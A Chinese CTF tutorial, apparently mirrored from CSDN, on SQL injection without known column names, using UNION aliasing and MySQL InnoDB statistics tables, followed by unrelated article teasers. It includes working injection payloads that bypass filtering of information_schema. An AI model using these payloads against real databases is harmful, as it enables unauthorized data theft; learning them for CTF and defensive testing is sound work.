CTF常用sql注入（三）无列名注入

CTF常用sql注入（三）无列名注入

pingmian/2025/4/5 8:17:38/文章来源:https://blog.csdn.net/2301_81040377/article/details/140189235

0x06 无列名

适用于无法正确的查出结果，比如把information_schema给过滤了

join

联合

select * from users;

在这里插入图片描述

select 1,2,3 union select * from users;

在这里插入图片描述

列名被替换成了1,2,3，
我们再利用子查询和别名查

select `2` from (select 1,2,3 union select * from users)a;

在这里插入图片描述
继续加大难度，不用反引号

select b from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
同时查询多个列

select concat(b,0x7e,c) from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
已知表名为flaga

password=\&username=,username=(select a from (select 1,2 as a,6 union select * from flaga limit 1,1)u)#

在这里插入图片描述
成功

0x07 InnoDb引擎

也是针对or的过滤来查询表名

innodb_index_stats和innodb_table_stats表

例句，缺点就是只能查表，配合无列名查询一起食用

(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/41766.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Go语言--工程管理、临时/永久设置GOPATH、main函数以及init函数

Go语言--工程管理、临时/永久设置GOPATH、main函数以及init函数

工作区 Go 代码必须放在工作区中。工作区其实就是一个对应于特定工程的目录，它应包含3个子目录:src 目录、pkg目录和bin 目录。 src 目录:用于以代码包的形式组织并保存 Go源码文件。(比如:.go.chs等)pkg 目录:用于存放经由 go install 命令构建安装后的代码包(包…

阅读更多...

芯片基识 | 掰开揉碎讲 FIFO（同步FIFO和异步FIFO）

芯片基识 | 掰开揉碎讲 FIFO（同步FIFO和异步FIFO）

文章目录一、什么是FIFO二、为什么要用FIFO三、什么时候用FIFO四、FIFO分类五、同步FIFO1. 同步FIFO电路框图2. 同步FIFO空满判断3. 同步FIFO设计代码4. 同步FIFO仿真结果六、异步FIFO1、异步FIFO的电路框图2 、亚稳态3、打两拍4、格雷码5、如何判断异步FIFO的空满&#xff0…

阅读更多...

react v18 less使用（craco）

react v18 less使用（craco）

方案一、弹出配置（不推荐） 安装依赖：yarn add less less-loader 首先执行 yarn eject 弹出配置项文件（注意：弹出配置不可逆！） 在 config 文件夹中找到 webpack.config.js，在如图…

阅读更多...

Spring Boot自动配置详解

Spring Boot自动配置详解

Spring Boot自动配置详解大家好，我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编，也是冬天不穿秋裤，天冷也要风度的程序猿！今天我们来详细探讨Spring Boot的自动配置机制。Spring Boot自动配置是其核心特性之一…

阅读更多...

爆破片和安全阀

爆破片和安全阀

一、爆破片介绍爆破片是一种用于安全释放压力的结构，通常应用于压力容器、管道和设备中，以防止由于压力过高而导致的灾难性故障。在压力超过设定值时，爆破片会破裂，从而迅速将过压泄放，保护设备和人员安全爆破片通常…

阅读更多...

Java并发编程详解

Java并发编程详解

在现代软件开发中，多线程和并发编程是提高应用程序性能的关键技术之一。Java提供了丰富的并发编程工具，使得开发者能够高效地实现多线程应用。本文将详细介绍Java中的线程和并发工具，探讨线程安全的概念，并分享实现线程安全的方法…

阅读更多...

java Web 优秀本科毕业论文系统用eclipse定制开发mysql数据库BS模式java编程jdbc

java Web 优秀本科毕业论文系统用eclipse定制开发mysql数据库BS模式java编程jdbc

一、源码特点 JSP 优秀本科毕业论文系统是一套完善的web设计系统，对理解JSP java serlvet 编程开发语言有帮助，系统具有完整的源代码和数据库，系统主要采用B/S模式开发。开发环境为TOMCAT7.0,eclipse开发，数据库为Mysql5.0&a…

阅读更多...

Selenium的这些自动化测试技巧你知道几个?

Selenium的这些自动化测试技巧你知道几个?

Selenium自动化测试技巧与以前瀑布式开发模式不同，现在软件测试人员具有使用自动化工具执行测试用例套件的优势，而以前，测试人员习惯于通过测试脚本执行来完成测试。但自动化测试的目的不是完全摆脱手动测试，而是最大程度地减少…

阅读更多...

数据库——常用SQL语句

数据库——常用SQL语句

title: 数据库——常用SQL语句 date: 2024-07-06 12:25:36 tags: 数据库 categories: 数据库 cover: /image/T1.jpg description: 数据库的常用SQL语句 SQL语句 SQL（Structured Query Language）是一种用于访问和操作数据库系统的标准编程语言。它允许用…

阅读更多...

用WPF实现的窗体是怎么运行的？

用WPF实现的窗体是怎么运行的？

在WPF应用程序中，窗体的启动通常是由Application类的实例来管理的。以下是WPF应用程序启动的基本流程： 初始化Application实例： 当WPF应用程序开始运行时，会自动创建一个Application实例。这个实例负责整个应用的生命周期管理&…

阅读更多...

24.【C语言】getchar putchar的使用

24.【C语言】getchar putchar的使用

1.基本作用用户输入字符，getchar()获取字符（含\n:即键入的Enter）（字符本质上是以ASCII值或EOF（-1）存储的）（与scanf有区别） putchar() 打印字符（把得到的A…

阅读更多...

pip 提示坏了 pip丢失重新安装

pip 提示坏了 pip丢失重新安装

(base) PS K:\download\pip丢失重新安装\3.8.1以上> conda active py361 usage: conda-script.py [-h] [-v] [--no-plugins] [-V] COMMAND ... conda-script.py: error: argument COMMAND: invalid choice: active (choose from clean, compare, config, create, info, init…

阅读更多...

代码随想录算法训练营DAY55｜42. 接雨水、84.柱状图中最大的矩形

代码随想录算法训练营DAY55｜42. 接雨水、84.柱状图中最大的矩形

42. 接雨水题目链接：42. 接雨水双指针 class Solution(object):def trap(self, height):""":type height: List[int]:rtype: int"""lh [0]*len(height)rh [0]*len(height)lh[0]height[0]for i in range(1, len(height)):lh[i] …

阅读更多...

嵌入式系统中状态机实现详解

嵌入式系统中状态机实现详解

嵌入式开发中系统经常处于某种状态，如何处理呢？接下来分析一下，状态机的实现无非就是 3 个要素：状态、事件、响应。转换成具体的行为就 3 句话。发生了什么事？现在系统处在什么状态？在这样的状态下发生了这样的事，系统要干什么？用 C 语言实现状态机主要有 3 种方法…

阅读更多...

LeetCode 60.排序排列（dfs暴力）

LeetCode 60.排序排列（dfs暴力）

给出集合 [1,2,3,...,n]，其所有元素共有 n! 种排列。按大小顺序列出所有排列情况，并一一标记，当 n 3 时, 所有排列如下： "123""132""213""231""312""321" 给定…

阅读更多...

机器学习——岭回归

机器学习——岭回归

1、岭回归与线性回归的区别岭回归（Ridge Regression）和线性回归（Linear Regression）都是用于回归分析的统计方法，但它们在处理方式和应用场景上有一些关键的区别： a)基本概念线性回归：目标是…

阅读更多...

css 函数（简略）与单位

css 函数（简略）与单位

css 函数（简略） 1、基础：content: attr()，url()， var()， element()， image-set()， 计数器： counter()， counters() 2、颜色： rgb()&#xff0…

阅读更多...

在pycharm里如何使用Jetbrains AI Assistant

在pycharm里如何使用Jetbrains AI Assistant

ai assistant激活成功后，如图 ai assistant渠道：https://web.52shizhan.cn/activity/ai-assistant 在去年五月份的 Google I/O 2023 上，Google 为 Android Studio 推出了 Studio Bot 功能，使用了谷歌编码基础模型 Codey,Codey 是…

阅读更多...

ABAP 发送正文含图片邮件

ABAP 发送正文含图片邮件

背景： 客户要求系统发送的邮件内容中含logo图片解决： 参考outlook中带图片的邮件，有两种形式，一种为url链接，需要点击下载才展示图片，一种为直接显示；如果使用ABAP发送该类型的邮件&#xff0…

阅读更多...

python类继承和类变量

python类继承和类变量

Python一些类继承和实例变量的使用定义基类 class APIException:code 500msg "Sorry, error"error_code 999def __init__(self, msgNone):print("APIException init ...")def error_400(self):pass复用基类的属性值 class ClientTypeError(APIExcept…

阅读更多...

最新文章